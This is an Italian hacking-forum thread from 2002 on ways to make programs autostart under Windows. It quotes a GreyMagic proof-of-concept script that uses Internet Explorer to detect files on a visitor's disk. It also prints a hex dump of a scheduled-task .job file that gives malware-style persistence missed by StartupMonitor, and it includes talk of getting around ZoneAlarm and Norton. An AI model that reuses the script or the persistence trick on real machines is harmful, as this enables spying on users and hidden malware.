Metodi di AUTOESECUZIONE ALL'AVVIO

di **BianConiglio** » 01/05/02 18:41

Per tutti quelli che mi mandano messaggi privati...suggerisco di postarli on-line, in modo che cose che io ritengo superflue e che interessano altri, possano essere lette da tutti.

Mi chiedete quale sia il bug per "detectare" l'esistenza di un file...

Date un occhio a questo script di GreyMagic ( Security Advisory GM#003-IE )

Codice: Seleziona tutto: <img dynsrc="file://c:/test.txt" id="oFile"> <script language="jscript" defer> setTimeout( function () { alert( oFile.fileSize>-1 ? "File exists!\n\n"+ "Size: "+oFile.fileSize+" bytes.\n"+ "Created: "+oFile.fileCreatedDate+".\n"+ "Modified: "+oFile.fileModifiedDate+".\n"+ "Updated: "+oFile.fileUpdatedDate+"." : "File does not exist." ); }, 250 ); </script>

Ma a dire il vero ne esistono altri, e varianti degli stessi che sono ancora più pericolosi, sia per la "detectione" di file, sia per la privacy dell'utente colpito.

Date un occhio al sito ( completo, chiaro e serio ) di GreyMagic, un bug finder israeliano. http://sec.greymagic.com/adv/

Altri mi chiedono se StartupMonitor si "accorga" dell'inserimento di un eseguibile o di un link nella cartella C:\WINDOWS\Menu Avvio\Programmi\Esecuzione automatica.... CERTO CHE SE NE ACCORGE...
Ma potete arrivarci da SOLI, provate prima id chiedere, è anche una delle reogle della netiquette. PROVATE. :!:

di **Pokemon123** » 03/05/02 09:14

GRAZIE BIANCONIGLIO !!!
Ti scrivo solo ora perchè prima ti ho solo letto con piacere ed interesse !

Non credo che molti abbiano capito tutto quello che hai scritto ! Bè io si! Volevo dirti che sei rivoluzionario, l'idea di attaccare le opzioni e non il programma in sè stesso è geniale! ho seguito alla lettera ciò che hai fatto e dove non dicevi le cose le immaginavo e facevo io.
Bè, volevo dirti che non hai detto stronzate, funziona!! Ho capito quali sono i file x ZA, ho capito come fare per il norton e devo dire ch enon ci avevo mai pensato eppure funziona !!! Se scrivi quel programma per monitorizzare i files delle opzioni + a rischio ti prego di renderlo disponibile a tutti ( parlando con amici che ne capisconom'hanno detto che sei famoso per non rendere mai i tuoi programmi tropo pubblici !!! dai, non farle il cattivo !! )

Senti, ti ringrazio per i tuoi lunghi post e per i tuoi codici !!! mi hai aperto la mente , ora capisco che con un semplice eseguibile ed una mente aperta si può fare fin troppo !!!

Io di metodi per eseguire file all'avvio non ne conosco altri, anzi, li ho imparati da te !!! continua così !! hey ragazzi, diamogli un po di riconoscimenti, sto ragazzo s'è sbattuto in sto topic !!!

CIAO

di **Argony** » 03/05/02 11:10

Tra i medoti di autoesecuzione all'avvio non sò se hai già pensato alla cartella presenta in Windows (dalla versione Me mi pare) di "Operazione Pianificate" dove è possibile specificare un file da eseguire e quando, se ogni ora.. o all'avvio del Pc.

Magari ne hai già parlato e a me è sfuggito :oops:

, altrimenti anche se è banale funziona perfettamente.

Cosa ne pensi ?

Ciao

di **BianConiglio** » 03/05/02 12:01

Ammetto di averci pensato ma per mancanza di tempo non ho sperimentato ne trovato file o chiavi responsabili ( ora son preso con ZoneAlarm ) Se hai suggerimenti... ( cmq non è presente solo nell' ME, ma anche nei suoi "fratellini" )

Per Pokemon...che dire.......grazie dell'apprezzamento

te ne sono grato.

di **Argony** » 03/05/02 13:21

I file di "Operazioni Pianificate" si trovano nella cartella c:\windows\tasks\ ma sono criptati e non si possono editare direttamente. Basta credo prepararlo sul proprio Pc e poi copiarlo.

Se hai delle News su come scavalcare Zone Alarm facci sapere che molti tra i quali io lo usano per "proteggersi" e sarebbe un bene/male se si potesse scavalcare tanto facilmente.

di **BianConiglio** » 03/05/02 19:55

Well done soldier !

Grazie, mi hai risparmiato un pochino di lavoro..... Penso che ora potrò smanettare su quei files e creare qualcosina.... Anche se nel caso specifico non bisognerebbe iniettare, ma creare, per forza di cose, un file .job da inserire nella task.

I file non sono criptati, solo per il fatto che aprendoli ( magari con notepad ) compaiano simboli "senza senso" non significa che lo siano.
Infatti quello non è un file di testo, ma binario, perciò contiene sequenze numeriche che non vengono riconosciute come "lettere". La codifia ASCII è la più diffusa ed è un'interpretazione del binario che assegna ad ogni lettera e simbolo ( ABC..abc...123...*+-.../~Üþ... ) 7 bit e permette quindi di rappresentare 128 caratteri ( per lingue con un bordello di letere tipo russo e cinese si usano codici a 8 bit ). L'ottavo bit nell' ASCII può venire utilizzato o per codificare altri 128 bit o come bit di parità per migliorarela sicurezza della trasmissione del dato. Cmq ora sono Off-Topic.

Ti ringrazio per l'aiuto, ciao ! Domani o stanotte posto qualcosa sui file .job. ( Zone Alarm è fermo alle chiamate addprogramtodatabase per ora )

Ciauzz

di **BianConiglio** » 04/05/02 11:10

Per chi mi scrive ANCORA in privato, rispondo ANCORA di scrivere in pubblico. Come editor io utilizzo Ida, con il quale mi trovo molto bene ( http://www.datarescue.com ).

Un generico file *.job responsabile dell'esecuzione di ZoneAlarm all'avvio del sistema è così formato :

Codice: Seleziona tutto: seg000:00000000 ; seg000:00000000 ; +---------------------------------------+ seg000:00000000 ; ¦ This file is generated by The Interactive Disassembler (IDA) ¦ seg000:00000000 ; ¦ Copyright (c) 2001 by DataRescue sa/nv, <ida@datarescue.com> ¦ seg000:00000000 ; ¦ Licensed to: Roger Cross, 1 user, std, 7/2000 ¦ seg000:00000000 ; +---------------------------------------+ seg000:00000000 ; seg000:00000000 seg000:00000000 seg000:00000000 ; ------------------------------------------- seg000:00000000 seg000:00000000 seg000 segment byte public 'CODE' use32 seg000:00000000 assume cs:seg000 seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing seg000:00000000 47 db 47h ; G seg000:00000001 04 db 4 ; seg000:00000002 01 db 1 ; seg000:00000003 00 db 0 ; seg000:00000004 07 db 7 ; seg000:00000005 A4 db 0A4h ; ñ seg000:00000006 14 db 14h ; seg000:00000007 00 db 0 ; seg000:00000008 7C db 7Ch ; | seg000:00000009 01 db 1 ; seg000:0000000A 39 db 39h ; 9 seg000:0000000B 00 db 0 ; seg000:0000000C 50 db 50h ; P seg000:0000000D D5 db 0D5h ; i seg000:0000000E D0 db 0D0h ; ð seg000:0000000F 04 db 4 ; seg000:00000010 00 db 0 ; seg000:00000011 00 db 0 ; seg000:00000012 00 db 0 ; seg000:00000013 00 db 0 ; seg000:00000014 46 db 46h ; F seg000:00000015 00 db 0 ; seg000:00000016 D6 db 0D6h ; Í seg000:00000017 00 db 0 ; seg000:00000018 00 db 0 ; seg000:00000019 00 db 0 ; seg000:0000001A 00 db 0 ; seg000:0000001B 00 db 0 ; seg000:0000001C 3C db 3Ch ; < seg000:0000001D 00 db 0 ; seg000:0000001E 0A db 0Ah ; seg000:0000001F 00 db 0 ; seg000:00000020 20 db 20h ; seg000:00000021 00 db 0 ; seg000:00000022 00 db 0 ; seg000:00000023 00 db 0 ; seg000:00000024 00 db 0 ; seg000:00000025 14 db 14h ; seg000:00000026 73 db 73h ; s seg000:00000027 0F db 0Fh ; seg000:00000028 00 db 0 ; seg000:00000029 00 db 0 ; seg000:0000002A 00 db 0 ; seg000:0000002B 00 db 0 ; seg000:0000002C 03 db 3 ; seg000:0000002D 13 db 13h ; seg000:0000002E 04 db 4 ; seg000:0000002F 00 db 0 ; seg000:00000030 C0 db 0C0h ; + seg000:00000031 00 db 0 ; seg000:00000032 80 db 80h ; Ç seg000:00000033 21 db 21h ; ! seg000:00000034 00 db 0 ; seg000:00000035 00 db 0 ; seg000:00000036 00 db 0 ; seg000:00000037 00 db 0 ; seg000:00000038 00 db 0 ; seg000:00000039 00 db 0 ; seg000:0000003A 00 db 0 ; seg000:0000003B 00 db 0 ; seg000:0000003C 00 db 0 ; seg000:0000003D 00 db 0 ; seg000:0000003E 00 db 0 ; seg000:0000003F 00 db 0 ; seg000:00000040 00 db 0 ; seg000:00000041 00 db 0 ; seg000:00000042 00 db 0 ; seg000:00000043 00 db 0 ; seg000:00000044 00 db 0 ; seg000:00000045 00 db 0 ; seg000:00000046 22 db 22h ; " seg000:00000047 00 db 0 ; seg000:00000048 43 db 43h ; C seg000:00000049 00 db 0 ; seg000:0000004A 3A db 3Ah ; : seg000:0000004B 00 db 0 ; seg000:0000004C 5C db 5Ch ; \ seg000:0000004D 00 db 0 ; seg000:0000004E 50 db 50h ; P seg000:0000004F 00 db 0 ; seg000:00000050 52 db 52h ; R seg000:00000051 00 db 0 ; seg000:00000052 4F db 4Fh ; O seg000:00000053 00 db 0 ; seg000:00000054 47 db 47h ; G seg000:00000055 00 db 0 ; seg000:00000056 52 db 52h ; R seg000:00000057 00 db 0 ; seg000:00000058 41 db 41h ; A seg000:00000059 00 db 0 ; seg000:0000005A 7E db 7Eh ; ~ seg000:0000005B 00 db 0 ; seg000:0000005C 31 db 31h ; 1 seg000:0000005D 00 db 0 ; seg000:0000005E 5C db 5Ch ; \ seg000:0000005F 00 db 0 ; seg000:00000060 5A db 5Ah ; Z seg000:00000061 00 db 0 ; seg000:00000062 4F db 4Fh ; O seg000:00000063 00 db 0 ; seg000:00000064 4E db 4Eh ; N seg000:00000065 00 db 0 ; seg000:00000066 45 db 45h ; E seg000:00000067 00 db 0 ; seg000:00000068 41 db 41h ; A seg000:00000069 00 db 0 ; seg000:0000006A 4C db 4Ch ; L seg000:0000006B 00 db 0 ; seg000:0000006C 7E db 7Eh ; ~ seg000:0000006D 00 db 0 ; seg000:0000006E 31 db 31h ; 1 seg000:0000006F 00 db 0 ; seg000:00000070 5C db 5Ch ; \ seg000:00000071 00 db 0 ; seg000:00000072 5A db 5Ah ; Z seg000:00000073 00 db 0 ; seg000:00000074 4F db 4Fh ; O seg000:00000075 00 db 0 ; seg000:00000076 4E db 4Eh ; N seg000:00000077 00 db 0 ; seg000:00000078 45 db 45h ; E seg000:00000079 00 db 0 ; seg000:0000007A 41 db 41h ; A seg000:0000007B 00 db 0 ; seg000:0000007C 4C db 4Ch ; L seg000:0000007D 00 db 0 ; seg000:0000007E 7E db 7Eh ; ~ seg000:0000007F 00 db 0 ; seg000:00000080 31 db 31h ; 1 seg000:00000081 00 db 0 ; seg000:00000082 2E db 2Eh ; . seg000:00000083 00 db 0 ; seg000:00000084 45 db 45h ; E seg000:00000085 00 db 0 ; seg000:00000086 58 db 58h ; X seg000:00000087 00 db 0 ; seg000:00000088 45 db 45h ; E seg000:00000089 00 db 0 ; seg000:0000008A 00 db 0 ; seg000:0000008B 00 db 0 ; seg000:0000008C 00 db 0 ; seg000:0000008D 00 db 0 ; seg000:0000008E 15 db 15h ; seg000:0000008F 00 db 0 ; seg000:00000090 43 db 43h ; C seg000:00000091 00 db 0 ; seg000:00000092 3A db 3Ah ; : seg000:00000093 00 db 0 ; seg000:00000094 5C db 5Ch ; \ seg000:00000095 00 db 0 ; seg000:00000096 50 db 50h ; P seg000:00000097 00 db 0 ; seg000:00000098 52 db 52h ; R seg000:00000099 00 db 0 ; seg000:0000009A 4F db 4Fh ; O seg000:0000009B 00 db 0 ; seg000:0000009C 47 db 47h ; G seg000:0000009D 00 db 0 ; seg000:0000009E 52 db 52h ; R seg000:0000009F 00 db 0 ; seg000:000000A0 41 db 41h ; A seg000:000000A1 00 db 0 ; seg000:000000A2 7E db 7Eh ; ~ seg000:000000A3 00 db 0 ; seg000:000000A4 31 db 31h ; 1 seg000:000000A5 00 db 0 ; seg000:000000A6 5C db 5Ch ; \ seg000:000000A7 00 db 0 ; seg000:000000A8 5A db 5Ah ; Z seg000:000000A9 00 db 0 ; seg000:000000AA 4F db 4Fh ; O seg000:000000AB 00 db 0 ; seg000:000000AC 4E db 4Eh ; N seg000:000000AD 00 db 0 ; seg000:000000AE 45 db 45h ; E seg000:000000AF 00 db 0 ; seg000:000000B0 41 db 41h ; A seg000:000000B1 00 db 0 ; seg000:000000B2 4C db 4Ch ; L seg000:000000B3 00 db 0 ; seg000:000000B4 7E db 7Eh ; ~ seg000:000000B5 00 db 0 ; seg000:000000B6 31 db 31h ; 1 seg000:000000B7 00 db 0 ; seg000:000000B8 00 db 0 ; seg000:000000B9 00 db 0 ; seg000:000000BA 06 db 6 ; seg000:000000BB 00 db 0 ; seg000:000000BC 75 db 75h ; u seg000:000000BD 00 db 0 ; seg000:000000BE 73 db 73h ; s seg000:000000BF 00 db 0 ; seg000:000000C0 65 db 65h ; e seg000:000000C1 00 db 0 ; seg000:000000C2 72 db 72h ; r seg000:000000C3 00 db 0 ; seg000:000000C4 78 db 78h ; x seg000:000000C5 00 db 0 ; seg000:000000C6 00 db 0 ; seg000:000000C7 00 db 0 ; seg000:000000C8 00 db 0 ; seg000:000000C9 00 db 0 ; seg000:000000CA 00 db 0 ; seg000:000000CB 00 db 0 ; seg000:000000CC 08 db 8 ; seg000:000000CD 00 db 0 ; seg000:000000CE 03 db 3 ; seg000:000000CF 13 db 13h ; seg000:000000D0 04 db 4 ; seg000:000000D1 00 db 0 ; seg000:000000D2 00 db 0 ; seg000:000000D3 00 db 0 ; seg000:000000D4 00 db 0 ; seg000:000000D5 00 db 0 ; seg000:000000D6 01 db 1 ; seg000:000000D7 00 db 0 ; seg000:000000D8 30 db 30h ; 0 seg000:000000D9 00 db 0 ; seg000:000000DA 00 db 0 ; seg000:000000DB 00 db 0 ; seg000:000000DC D2 db 0D2h ; Ê seg000:000000DD 07 db 7 ; seg000:000000DE 05 db 5 ; seg000:000000DF 00 db 0 ; seg000:000000E0 04 db 4 ; seg000:000000E1 00 db 0 ; seg000:000000E2 00 db 0 ; seg000:000000E3 00 db 0 ; seg000:000000E4 00 db 0 ; seg000:000000E5 00 db 0 ; seg000:000000E6 00 db 0 ; seg000:000000E7 00 db 0 ; seg000:000000E8 00 db 0 ; seg000:000000E9 00 db 0 ; seg000:000000EA 00 db 0 ; seg000:000000EB 00 db 0 ; seg000:000000EC 00 db 0 ; seg000:000000ED 00 db 0 ; seg000:000000EE 00 db 0 ; seg000:000000EF 00 db 0 ; seg000:000000F0 00 db 0 ; seg000:000000F1 00 db 0 ; seg000:000000F2 00 db 0 ; seg000:000000F3 00 db 0 ; seg000:000000F4 00 db 0 ; seg000:000000F5 00 db 0 ; seg000:000000F6 00 db 0 ; seg000:000000F7 00 db 0 ; seg000:000000F8 06 db 6 ; seg000:000000F9 00 db 0 ; seg000:000000FA 00 db 0 ; seg000:000000FB 00 db 0 ; seg000:000000FC 01 db 1 ; seg000:000000FD 00 db 0 ; seg000:000000FE 00 db 0 ; seg000:000000FF 00 db 0 ; seg000:00000100 00 db 0 ; seg000:00000101 00 db 0 ; seg000:00000102 00 db 0 ; seg000:00000103 00 db 0 ; seg000:00000104 00 db 0 ; seg000:00000105 00 db 0 ; seg000:00000106 00 db 0 ; seg000:00000107 00 db 0 ; seg000:00000107 seg000 ends seg000:00000107 seg000:00000107 seg000:00000107 end

Il file è di 264 byte, pertanto facilmente creabile da un eseguibile malefico. StartupMonitor non rileva alcun tentativo di esecuzione all'avvio del s.o., lo comunicherò al suo creatore.

Penso che aggiungerò questo metodo al tutoria che sto scrivendo.

Bene Bene, grazie Argony.

di **Argony** » 04/05/02 16:03

Sicuro che i file .job siano file Binari e non ad Accesso Random ?
Mi ricordo che i file di quest'ultimo sono adatti a salvare dati di breve lunghezza in vari punti del file, cioè:
nel punto 0 metto NOME, nel punto 3 metto PATH e così via in modo da richiamare alla lettura solo quello che mi interessa.
La caratteristica di questi file è che aprendoli con un editor tipo notepad non si legge correttamente il testo, ma cmq si riescono a distiungere le frasi inserite intevallate però da caratteri strani.
Così infatti appaiono i miei file .job, ecco in esempio:

”P F ž ÿ s À!Ò ( C : \ W I N D O W S \ P C H E A L T H \ S U P P O R T \ P C H S C H D . E X E - c q O p e r a z i o n e p i a n i f i c a t a p e r l ' u t i l i t à d i p i a n i f i c a z i o n e d i P r e v e n z i o n e e r i s o l u z i o n e d e i p r o b l e m i ( R a c c o l t a d a t i ) /

I file Binari (come gli eseguibili) invece dovrebbero essere totalmente formati da caratteri strati.

Queste mie affermazioni sono corrette o ho detto solo una serie di caz... ?

di **BianConiglio** » 04/05/02 17:13

Le tue affermazioni sono corrette

ma non era quello che intendevo io !
Io ho solamente sottolineato il fatto che i dati vengono immagazzinati in binario e poi sta a noi o ad uno specifico programma, interpretare il binario. A seconda del programma o della metodologia utilizzata ecco che ad una sequanza di zeri ed uni viene assegnato un significato piuttosto cche un altro...tutto qua...
Insomma...non è un file di testo e pertanto non è "completamente" interpretabile a vista d'occhio.

Se fosse criptato non si vedrebba la path e la descrizione.....

Cmq ti ringrazio ancora

ora c'è un nuovo metodo di autoesecuzione all'avvio E a evento prestabilito all'interno del tutorial.

Metodi di AUTOESECUZIONE ALL'AVVIO

Topic correlati a "Metodi di AUTOESECUZIONE ALL'AVVIO":

Chi c’è in linea